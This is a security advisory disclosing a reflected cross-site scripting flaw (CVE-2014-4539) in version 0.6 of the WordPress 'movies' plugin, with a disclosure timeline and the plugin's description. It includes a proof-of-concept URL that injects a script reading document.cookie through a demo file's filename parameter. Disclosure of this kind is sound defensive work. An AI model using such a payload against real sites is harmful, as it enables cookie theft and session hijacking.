Plugin Details
Plugin Name: wp-plugin : movies
Effected Version : 0.6 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://127.0.0.1/wordpress/wp-content/wp-plugs/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4539
Plugin Description :
[|
Movies allows you to use simple functions in your theme to display videos you have attached to Posts/Pages/Custom Post Types in your Media Library. Your player is styled 100% with CSS/images (if you want). The video player uses the MediaElement (by default, or VideoJS - you pick!) library and your browser's native HTML5 capabilities when available with a fallback to Flash when necessary. Allows you to play video inline on mobile browsers that support HTML5 Video. Video metadata is written to the page using the hMedia micro-format for semantic markup.
You can use this shortcode <code>[movies]</code> or <code>the_movies()</code> or <code>the_videos()</code> in your theme to output your item's attachments.
You may need to add these Mime-Type declarations to <code>httpd.conf</code> or your <code>.htaccess</code> file
<code>
AddType video/ogg .ogv
AddType video/mp4 .mp4
AddType video/webm .webm
</code>
Read More here: http://scottctaylor.wordpress.com/2010/11/24/new-plugin-movies/
Follow-up: http://scottctaylor.wordpress.com/2010/11/28/movies-plugin-now-supports-webm/
Latest: http://scottctaylor.wordpress.com/2010/12/07/movies-v0-4-now-with-mediaelement-support/
]